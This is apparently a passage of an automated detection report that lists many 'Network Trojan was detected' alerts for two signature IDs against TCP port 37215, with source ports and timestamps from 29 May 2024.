                SID:2835222
                Source Port:50212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277632
                SID:2829579
                Source Port:46306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435845
                SID:2835222
                Source Port:42170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957513
                SID:2835222
                Source Port:48190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.230772
                SID:2835222
                Source Port:52666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331260
                SID:2835222
                Source Port:55016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136088
                SID:2835222
                Source Port:53778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.279339
                SID:2835222
                Source Port:44984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807648
                SID:2829579
                Source Port:41808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.801290
                SID:2829579
                Source Port:58306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586727
                SID:2829579
                Source Port:52996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069966
                SID:2829579
                Source Port:34222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782001
                SID:2829579
                Source Port:54466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166237
                SID:2829579
                Source Port:36712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504815
                SID:2829579
                Source Port:44244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896545
                SID:2829579
                Source Port:51032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780688
                SID:2829579
                Source Port:48234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.729055
                SID:2829579
                Source Port:43126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264311
                SID:2829579
                Source Port:52768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318001
                SID:2835222
                Source Port:47840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023121
                SID:2829579
                Source Port:47404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.871690
                SID:2829579
                Source Port:54684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689181
                SID:2835222
                Source Port:37910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.932042
                SID:2835222
                Source Port:37116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814665
                SID:2829579
                Source Port:56796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667799
                SID:2835222
                Source Port:53528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694616
                SID:2829579
                Source Port:48226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038167
                SID:2835222
                Source Port:59396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.270360
                SID:2835222
                Source Port:39826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.823347
                SID:2829579
                Source Port:42964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662058
                SID:2835222
                Source Port:38358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267015
                SID:2835222
                Source Port:43282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436218
                SID:2835222
                Source Port:51480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207290
                SID:2835222
                Source Port:59000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390782
                SID:2835222
                Source Port:47502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.129086
                SID:2829579
                Source Port:45092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013798
                SID:2835222
                Source Port:46178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328306
                SID:2829579
                Source Port:33862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948614
                SID:2829579
                Source Port:40636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730676
                SID:2835222
                Source Port:49568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965440
                SID:2835222
                Source Port:51782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893397
                SID:2829579
                Source Port:44114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026630
                SID:2835222
                Source Port:48078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262040
                SID:2829579
                Source Port:48344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815803
                SID:2829579
                Source Port:57988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835777
                SID:2829579
                Source Port:46890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561923
                SID:2835222
                Source Port:59822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926332
                SID:2829579
                Source Port:50002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416285
                SID:2829579
                Source Port:54674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.283772
                SID:2835222
                Source Port:46408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897152
                SID:2835222
                Source Port:55984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179498
                SID:2835222
                Source Port:48146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660457
                SID:2829579
                Source Port:41906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287844
                SID:2835222
                Source Port:56072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173856
                SID:2835222
                Source Port:56962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420525
                SID:2829579
                Source Port:46720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784125
                SID:2829579
                Source Port:35632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537524
                SID:2829579
                Source Port:47338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785507
                SID:2829579
                Source Port:46800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207989
                SID:2835222
                Source Port:35842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502138
                SID:2835222
                Source Port:50448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950094
                SID:2829579
                Source Port:39450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170507
                SID:2835222
                Source Port:51342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233836
                SID:2835222
                Source Port:32830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559095
                SID:2829579
                Source Port:33328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905203
                SID:2829579
                Source Port:54630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688251
                SID:2835222
                Source Port:52788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434122
                SID:2835222
                Source Port:43014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528012
                SID:2829579
                Source Port:47712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172175
                SID:2835222
                Source Port:44102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669396
                SID:2829579
                Source Port:47020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624898
                SID:2829579
                Source Port:43656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.918516
                SID:2829579
                Source Port:46190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.164847
                SID:2835222
                Source Port:52382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844556
                SID:2835222
                Source Port:47980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363086
                SID:2835222
                Source Port:37088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184241
                SID:2829579
                Source Port:42294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519868
                SID:2829579
                Source Port:45950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042441
                SID:2835222
                Source Port:55162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321669
                SID:2835222
                Source Port:57750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177343
                SID:2835222
                Source Port:35072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.796989
                SID:2835222
                Source Port:43208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.232162
                SID:2835222
                Source Port:50118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228239
                SID:2829579
                Source Port:53174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933070
                SID:2829579
                Source Port:33834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559168
                SID:2829579
                Source Port:45906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630471
                SID:2835222
                Source Port:34654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571189
                SID:2829579
                Source Port:50294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798011
                SID:2835222
                Source Port:57412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900203
                SID:2829579
                Source Port:40464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.257209
                SID:2829579
                Source Port:59036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614174
                SID:2835222
                Source Port:33902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901135
                SID:2829579
                Source Port:51780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234290
                SID:2829579
                Source Port:35318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.388659
                SID:2829579
                Source Port:42986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652446
                SID:2829579
                Source Port:56316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854501
                SID:2829579
                Source Port:42006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381304
                SID:2835222
                Source Port:54366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667915
                SID:2835222
                Source Port:40980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.036967
                SID:2829579
                Source Port:53812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.436863
                SID:2829579
                Source Port:47854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787723
                SID:2829579
                Source Port:42086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873051
                SID:2835222
                Source Port:54984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236569
                SID:2835222
                Source Port:57804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944668
                SID:2829579
                Source Port:35164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728631
                SID:2829579
                Source Port:57432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854831
                SID:2829579
                Source Port:53520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.979327
                SID:2829579
                Source Port:56544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854260
                SID:2829579
                Source Port:44604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175677
                SID:2829579
                Source Port:55896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509802
                SID:2835222
                Source Port:35128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853269
                SID:2835222
                Source Port:53008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282040
                SID:2835222
                Source Port:41708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727255
                SID:2835222
                Source Port:55852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878625
                SID:2835222
                Source Port:45348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782937
                SID:2829579
                Source Port:36090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620262
                SID:2835222
                Source Port:47230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584316
                SID:2835222
                Source Port:47084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683545
                SID:2829579
                Source Port:60962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384370
                SID:2829579
                Source Port:43496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462491
                SID:2835222
                Source Port:54282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767469
                SID:2835222
                Source Port:43780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374462
                SID:2835222
                Source Port:53264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948519
                SID:2829579
                Source Port:39416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.964100
                SID:2835222
                Source Port:43912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868356
                SID:2835222
                Source Port:53450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615333
                SID:2835222
                Source Port:50628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222904
                SID:2835222
                Source Port:38180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615106
                SID:2835222
                Source Port:54424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826779
                SID:2835222
                Source Port:55080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281922
                SID:2835222
                Source Port:54010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.102381
                SID:2835222
                Source Port:42458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559669
                SID:2835222
                Source Port:37398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933117
                SID:2835222
                Source Port:44478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039576
                SID:2835222
                Source Port:41176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.137787
                SID:2835222
                Source Port:41092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.910016
                SID:2829579
                Source Port:37382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.454242
                SID:2835222
                Source Port:55000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947627
                SID:2835222
                Source Port:40054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.068043
                SID:2835222
                Source Port:48122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765545
                SID:2829579
                Source Port:41826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281603
                SID:2835222
                Source Port:35892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069699
                SID:2835222
                Source Port:42262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166936
                SID:2829579
                Source Port:38400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841477
                SID:2829579
                Source Port:41198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.920884
                SID:2829579
                Source Port:57212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975188
                SID:2829579
                Source Port:33472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233231
                SID:2835222
                Source Port:45672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859543
                SID:2835222
                Source Port:35868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718502
                SID:2829579
                Source Port:55678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728594
                SID:2829579
                Source Port:33210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984952
                SID:2835222
                Source Port:33706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.161259
                SID:2835222
                Source Port:52634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929076
                SID:2829579
                Source Port:36108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.812870
                SID:2829579
                Source Port:48368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375302
                SID:2835222
                Source Port:40992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.738406
                SID:2835222
                Source Port:48272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843522
                SID:2829579
                Source Port:49448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980143
                SID:2835222
                Source Port:54664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.650019
                SID:2835222
                Source Port:55632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726334
                SID:2829579
                Source Port:52020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900279
                SID:2829579
                Source Port:59384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420964
                SID:2829579
                Source Port:54708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227130
                SID:2829579
                Source Port:38404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915060
                SID:2835222
                Source Port:42796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791608
                SID:2829579
                Source Port:47186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611272
                SID:2829579
                Source Port:43722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.802945
                SID:2835222
                Source Port:36262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189903
                SID:2829579
                Source Port:52586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681820
                SID:2835222
                Source Port:37460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.921088
                SID:2835222
                Source Port:44028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.608341
                SID:2829579
                Source Port:36900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076252
                SID:2829579
                Source Port:49144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442616
                SID:2835222
                Source Port:57110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210663
                SID:2829579
                Source Port:51366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916027
                SID:2835222
                Source Port:46642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969573
                SID:2829579
                Source Port:55848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.720125
                SID:2829579
                Source Port:49140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135342
                SID:2829579
                Source Port:36486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028008
                SID:2835222
                Source Port:44494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617040
                SID:2829579
                Source Port:51704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931113
                SID:2829579
                Source Port:55408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.934933
                SID:2835222
                Source Port:39610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598026
                SID:2829579
                Source Port:59178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730378
                SID:2835222
                Source Port:53954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985660
                SID:2829579
                Source Port:37450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903760
                SID:2835222
                Source Port:38372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852583
                SID:2835222
                Source Port:33160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908901
                SID:2835222
                Source Port:42038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796782
                SID:2829579
                Source Port:35972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277689
                SID:2829579
                Source Port:59138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984877
                SID:2829579
                Source Port:35098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.160973
                SID:2829579
                Source Port:52962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179730
                SID:2829579
                Source Port:46896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639037
                SID:2829579
                Source Port:47060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173118
                SID:2829579
                Source Port:44852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189852
                SID:2835222
                Source Port:35884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997792
                SID:2835222
                Source Port:43610
                Destination Port:37215
